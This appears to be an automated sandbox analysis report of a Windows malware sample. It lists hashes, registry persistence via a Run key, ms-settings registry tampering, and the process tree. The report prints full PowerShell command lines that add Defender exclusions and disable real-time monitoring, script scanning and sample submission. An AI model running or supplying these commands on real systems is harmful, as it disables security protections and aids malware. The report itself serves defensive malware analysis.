Analysis
-
max time kernel
121s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
18-06-2024 17:46
Behavioral task
behavioral1
Sample
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Resource
win7-20240611-en
General
-
Target
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
-
Size
405KB
-
MD5
c4e10100c5cf7bec2d9d0a1d7203ddb2
-
SHA1
24a6ecd52fb2165b8563a2853898316851638871
-
SHA256
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7
-
SHA512
ff6bd9bdcb95641c5e19aeef99d9cdddb33b5b309ec358a1a50ba00d2cea9a3fa22a0239b4e09d4a8904d4b7f470bbc621d5e0d60331bc5800709d308faf3202
-
SSDEEP
6144:0NYzj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZbYdNpmIU:eYzAq81g5aN+BoKD
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 564 powershell.exe 2752 powershell.exe 2992 powershell.exe 1636 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\JkanJjJrabo = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe" fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open\command fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key deleted \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open\command fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key deleted \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key deleted \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open\command\ fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe 2752 powershell.exe 2652 powershell.exe 2620 powershell.exe 2992 powershell.exe 564 powershell.exe 1636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 2992 powershell.exe Token: SeDebugPrivilege 564 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exepid process 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.execmd.execmd.exedescription pid process target process PID 836 wrote to memory of 3060 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 836 wrote to memory of 3060 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 836 wrote to memory of 3060 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 836 wrote to memory of 2644 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 836 wrote to memory of 2644 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 836 wrote to memory of 2644 836 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 3060 wrote to memory of 2752 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 2752 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 2752 3060 cmd.exe powershell.exe PID 2644 wrote to memory of 2652 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 2652 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 2652 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 2620 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 2620 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 2620 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 2992 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 2992 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 2992 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 564 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 564 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 564 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 1636 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 1636 2644 cmd.exe powershell.exe PID 2644 wrote to memory of 1636 2644 cmd.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe"C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe"1⤵
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Cab8133.tmpFilesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD581ec9057223b610190f3431b4afd87e6
SHA1c2cb781c0611d05bdf1ded03f4202d7de50e331d
SHA256b230d68cdc94c7537514660c20d96bb4056483d316c70622d3b6ae137a4f598d
SHA512d6ef72c8822ee67e447cd07eae342030fbcf778ebc051311af1c9f1efbbce4b8274e7e00fac0d9db9d25617438134b5a2323d037739faa8fc68b252090e0cf0d
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/564-48-0x00000000022A0000-0x00000000022A8000-memory.dmpFilesize
32KB
-
memory/836-2-0x000007FEF5E20000-0x000007FEF680C000-memory.dmpFilesize
9.9MB
-
memory/836-1-0x0000000001390000-0x00000000013FC000-memory.dmpFilesize
432KB
-
memory/836-0-0x000007FEF5E23000-0x000007FEF5E24000-memory.dmpFilesize
4KB
-
memory/836-57-0x000007FEF5E23000-0x000007FEF5E24000-memory.dmpFilesize
4KB
-
memory/836-58-0x000007FEF5E20000-0x000007FEF680C000-memory.dmpFilesize
9.9MB
-
memory/1636-55-0x000000001B2D0000-0x000000001B5B2000-memory.dmpFilesize
2.9MB
-
memory/1636-56-0x0000000001F50000-0x0000000001F58000-memory.dmpFilesize
32KB
-
memory/2752-18-0x0000000001FD0000-0x0000000001FD8000-memory.dmpFilesize
32KB
-
memory/2752-17-0x000000001B3E0000-0x000000001B6C2000-memory.dmpFilesize
2.9MB
-
memory/2992-24-0x000000001B370000-0x000000001B652000-memory.dmpFilesize
2.9MB
-
memory/2992-25-0x0000000001E60000-0x0000000001E68000-memory.dmpFilesize
32KB